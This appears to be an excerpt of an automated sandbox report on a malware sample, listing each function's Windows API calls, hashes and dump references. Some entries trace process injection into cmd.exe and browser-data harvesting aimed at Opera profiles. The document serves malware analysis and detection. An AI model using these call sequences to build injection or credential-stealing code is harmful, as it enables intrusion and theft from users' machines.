                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: /$UT
                                                                                                                                                                                                                                                          • API String ID: 0-1626504983
                                                                                                                                                                                                                                                          • Opcode ID: 61401cfe4a98bb36a07a4f03108eff2fdb378ec68a6c1d80551b9732ccda44ac
                                                                                                                                                                                                                                                          • Instruction ID: 9463dde5de3c1625c73f698d50cda1f04685505c6dd2f4b5634b1adde0c3548c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61401cfe4a98bb36a07a4f03108eff2fdb378ec68a6c1d80551b9732ccda44ac
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16029EB1D0026C8BDF21CF64CD807AEBBB5AF45310F1840E9DA48AB256D7349E84EF95
                                                                                                                                                                                                                                                          Function 00FEF840 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130threadinjectionmemoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FEF872
                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,010155BD,00000000,00000000,00000001,00000004,00000000,00000000,?,?,00000000,00000000,?), ref: 00FEF896
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00FEF8A8
                                                                                                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00FEF8BA
                                                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00FEF8D8
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00FEF8EE
                                                                                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 00FEF8FE
                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,00000000,00FF2F30,?,00000000), ref: 00FEF91D
                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00FEF953
                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,D798E8F4,00000004,00000000), ref: 00FEF97A
                                                                                                                                                                                                                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00FEF98C
                                                                                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 00FEF995
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
                                                                                                                                                                                                                                                          • String ID: ($C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          • API String ID: 3621800378-4087486346
                                                                                                                                                                                                                                                          • Opcode ID: 941cac70ef4b5464ec263cbcf71bba089a8c719e1330514eaa38da741808bc74
                                                                                                                                                                                                                                                          • Instruction ID: 791cff35450fe79cae7f8ecaf9ac3785e58dbed3eff3f80087a679294234e1fc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 941cac70ef4b5464ec263cbcf71bba089a8c719e1330514eaa38da741808bc74
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96412672A00208AFEB21DFA5DC85FAEB7B9FB48704F004464FA45EA161D375A954DB21
                                                                                                                                                                                                                                                          Function 00FE1D70 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,01019A50,01019A54,01015A0F,01015A0E,00FF77E1,?,00000000), ref: 00FE1F94
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01019A58), ref: 00FE1FC7
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01019A5C), ref: 00FE1FE1
                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,01019A60,01019A64,?,01019A68,01015A12), ref: 00FE20CD
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FE22B3
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1FDF: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00FF2020
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00FE2326
                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00FE2392
                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00FE23A6
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FE25CC
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00FE263F
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: Sleep.KERNEL32(000003E8,?,?), ref: 00FF70DB
                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00FE26B6
                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00FE26CA
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: CreateThread.KERNEL32(00000000,00000000,00FF6FA3,?,00000000,00000000), ref: 00FF7113
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FF711B
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1FB5: GetFileAttributesA.KERNEL32(?,?,?,00FEDC33,?,?,?), ref: 00FF1FBC
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                                                                                          • API String ID: 1475085387-1173974218
                                                                                                                                                                                                                                                          • Opcode ID: 05ce9b4c9c81963e2c09c6a4b3d48b6f8b3419d138316b73f08259d1e16ac0f8
                                                                                                                                                                                                                                                          • Instruction ID: 224e4487545fd5c59dff81b1e04a96f3760a5bbd1f5985f293393414681131aa
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05ce9b4c9c81963e2c09c6a4b3d48b6f8b3419d138316b73f08259d1e16ac0f8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F532967290116D9BCF60FB26DD46ADDB378AF00304F4155E1BA4877122DBB9AF85AF80
                                                                                                                                                                                                                                                          Function 00FF561A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF5647
                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 00FF565E
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01015A68), ref: 00FF567F
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01015A6C), ref: 00FF5699
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FF56EA
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FF56FD
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FF5711
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FF5724
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01015A70), ref: 00FF5736
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FF574A
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
                                                                                                                                                                                                                                                            • Part of subcall function 00FE85FA: CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: CreateThread.KERNEL32(00000000,00000000,00FF6FA3,?,00000000,00000000), ref: 00FF7113
                                                                                                                                                                                                                                                            • Part of subcall function 00FF7074: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FF711B
                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00FF5800
                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00FF5814
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                                                                                          • String ID: %s\%s
                                                                                                                                                                                                                                                          • API String ID: 1150833511-4073750446
                                                                                                                                                                                                                                                          • Opcode ID: 0d6601263f8a857720b19349100a612b58f91c1fed71a6eb398475d971a9247a
                                                                                                                                                                                                                                                          • Instruction ID: d4448d7b609ba53ca610900d704f7226449464dd2e1dbb5801a28b563f21cacc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d6601263f8a857720b19349100a612b58f91c1fed71a6eb398475d971a9247a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87514BB294021D9FCF60EB64DC89AD9B7BCAF49310F4045E5A748E3204EB35AB85CF65
                                                                                                                                                                                                                                                          Function 00FEC087 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,\*.*,0101584E,00FECDF2,?,?), ref: 00FEC0FF
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,010164A4), ref: 00FEC11F
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,010164A8), ref: 00FEC139
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera,0101586F,01015867,01015863,0101585B,0101585A,01015857,0101584F), ref: 00FEC1C5
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera GX), ref: 00FEC1D3
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 00FEC1E1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                          • String ID: Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                                                          • API String ID: 2567437900-1710495004
                                                                                                                                                                                                                                                          • Opcode ID: 150870b4bd43174b6e28e5e24586c3937456cf7c5ff89e3de271c99592816624
                                                                                                                                                                                                                                                          • Instruction ID: 1dfbb551404818bc2b95f331412251bcfa6df11a9ded9b00652ef8d3104c071a
